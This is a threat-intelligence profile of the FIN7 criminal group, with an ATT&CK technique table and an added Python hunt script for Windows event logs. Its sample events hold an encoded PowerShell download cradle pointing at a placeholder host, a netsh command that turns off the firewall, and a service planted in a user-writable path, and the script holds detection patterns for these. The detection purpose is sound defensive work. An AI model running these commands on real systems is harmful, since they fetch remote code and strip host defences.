FIN7
Actor Type | Criminal Group |
---|---|
Affiliated Intrusion Sets | ALPHV Blackcat Ransomware Group |
FIN7 is a financially motivated criminal group that Mandiant has tracked since 2015; its activity overlaps with that of the Carbanak Group.
The group has targeted more than 100 organizations, initially focusing on stealing payment card data. Its operations subsequently extended beyond card data theft to include attacks on finance departments within victim organizations. In April 2017, it sent spear-phishing emails to personnel involved in United States Securities and Exchange Commission (SEC) filings, indicating an interest in material non-public information that could be used for a stock-trading advantage.
Its innovation and social engineering prowess have allowed it to impact diverse industries, including restaurants, travel, hospitality, education, casinos, gaming, construction, energy, retail, finance, telecommunications, high-tech, government, software, and business services.
Over time, its TTPs have evolved, and more recent reporting has linked the group to ransomware intrusions, consistent with the ALPHV/BlackCat affiliation noted above.
FIN7 Threat Reports
Threat Group FIN7 Targets the U.S. Automotive Industry
In late 2023, BlackBerry analysts discovered a targeted attack by FIN7 on a U.S. automotive manufacturer, exploiting IT employees with higher ...
References
https://www.mandiant.com/resources/blog/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation
https://www.mandiant.com/resources/blog/evolution-of-fin7
https://www.mandiant.com/resources/blog/mahalo-fin7-responding-to-new-tools-and-techniques
https://www.mandiant.com/resources/blog/fin7-phishing-lnk
https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
https://www.mandiant.com/resources/blog/fin7-spear-phishing-campaign-targets-personnel-involved-sec-filings
MITRE ATT&CK Techniques
MITRE ATT&CK techniques observed in use by this intrusion set.
ATT&CK ID | Title | Associated Tactics |
---|---|---|
T1057 | Process Discovery | Discovery |
T1087.002 | Domain Account | Discovery |
T1059.001 | PowerShell | Execution |
T1562.004 | Disable or Modify System Firewall | Defense Evasion |
T1090 | Proxy | Command and Control |
T1543.003 | Windows Service | Persistence, Privilege Escalation |
T1566.002 | Spearphishing Link | Initial Access |
T1608.005 | Link Target | Resource Development |
T1069.002 | Domain Groups | Discovery |
T1564.001 | Hidden Files and Directories | Defense Evasion |
T1027 | Obfuscated Files or Information | Defense Evasion |
T1204.002 | Malicious File | Execution |
T1583.001 | Domains | Resource Development |
T1041 | Exfiltration Over C2 Channel | Exfiltration |
T1124 | System Time Discovery | Discovery |
T1033 | System Owner/User Discovery | Discovery |
T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation |
T1082 | System Information Discovery | Discovery |
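The technique table above is only useful to a defender once it is turned into hunt logic. The following is an added example written for this page; it is not code from Mandiant, BlackBerry, or the source profile, and the sample events are constructed for illustration (they are not FIN7 indicators). It keys a few simple rules to the table's technique IDs: a scheduled task whose action is a script host (T1053.005, T1059.001), an -EncodedCommand payload that is decoded from its UTF-16LE base64 form (T1027), netsh turning the host firewall off (T1562.004), and a new service installed from a user-writable path (T1543.003). The event shape (a flat dict with `event_id`, `command_line`, `image`, `image_path`, `task_name`, `service_name`) is an assumed simplification of Windows Security, System and Sysmon events, not the real XML layout.

```python
"""Hunt rules keyed to the ATT&CK techniques in the FIN7 profile table.

Added example; not vendor code and not FIN7 IOCs. Event shape is a constructed,
flattened rendering of Windows Security (4688/4697/4698), System (7045) and
Sysmon (1) events; field names are assumptions for this example.
"""
import base64
import re


def _encoded_ps(script: str) -> str:
    # powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (hypothetical host, user and paths).
SAMPLE_EVENTS = [
    # 4698: scheduled task whose action is hidden, encoded PowerShell download cradle
    {"event_id": 4698, "host": "ws-fin-07", "user": "CORP\\jdoe",
     "task_name": "\\Microsoft\\Windows\\UpdateCheck",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + _encoded_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    # Sysmon 1: host firewall disabled via netsh
    {"event_id": 1, "host": "ws-fin-07", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\netsh.exe",
     "command_line": "netsh advfirewall set allprofiles state off"},
    # 7045: new service whose binary lives in a user-writable directory
    {"event_id": 7045, "host": "ws-fin-07", "user": "SYSTEM",
     "service_name": "WinSvcHost",
     "image_path": "C:\\Users\\Public\\Libraries\\svchost.exe"},
    # Benign control: scheduled task running a plain application binary
    {"event_id": 4698, "host": "ws-fin-07", "user": "CORP\\jdoe",
     "task_name": "\\Corp\\BackupSync",
     "command_line": "C:\\Program Files\\Corp\\backup.exe --sync"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a base64 run and let the decoder validate it.
ENC_FLAG = re.compile(r"(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
SCRIPT_HOSTS = re.compile(r"(?i)\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b")
PS_HOST = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
FW_OFF = re.compile(r"(?i)advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+(?:mode=)?disable")
SUSPICIOUS_PATHS = re.compile(r"(?i)\\(?:users\\public|programdata|windows\\temp|users\\[^\\]+\\appdata)\\")


def decode_encoded_powershell(command_line: str):
    """Return the plaintext of an -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def evaluate(event: dict) -> dict:
    """Map one event to the technique IDs it matches, plus any decoded payload."""
    eid = event.get("event_id")
    cmd = event.get("command_line", "")
    image = event.get("image", event.get("image_path", ""))
    hits = set()
    decoded = None

    if eid in (1, 4688, 4698) and SCRIPT_HOSTS.search(cmd):
        if eid == 4698:
            hits.add("T1053.005")  # task action is a script/LOLBin host, not an app binary
        if PS_HOST.search(cmd):
            hits.add("T1059.001")
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            hits.add("T1027")      # command hidden behind base64/UTF-16LE encoding

    if eid in (1, 4688) and image.lower().endswith("netsh.exe") and FW_OFF.search(cmd):
        hits.add("T1562.004")

    if eid in (7045, 4697) and (SUSPICIOUS_PATHS.search(image) or SCRIPT_HOSTS.search(image)):
        hits.add("T1543.003")

    return {"techniques": sorted(hits), "decoded": decoded}


def triage(events) -> list:
    """Return only the events that matched at least one technique."""
    findings = []
    for ev in events:
        result = evaluate(ev)
        if result["techniques"]:
            findings.append({"host": ev.get("host"), "user": ev.get("user"),
                             "event_id": ev.get("event_id"), **result})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["host"], f["event_id"], f["techniques"], f["decoded"])
```

Decoding the encoded command before matching is the important step: a rule that only looks for the literal string "DownloadString" in the raw command line never sees it, because the payload is base64 of UTF-16LE text. The benign BackupSync task produces no finding, which is the check worth keeping as a regression test when the rules are tightened.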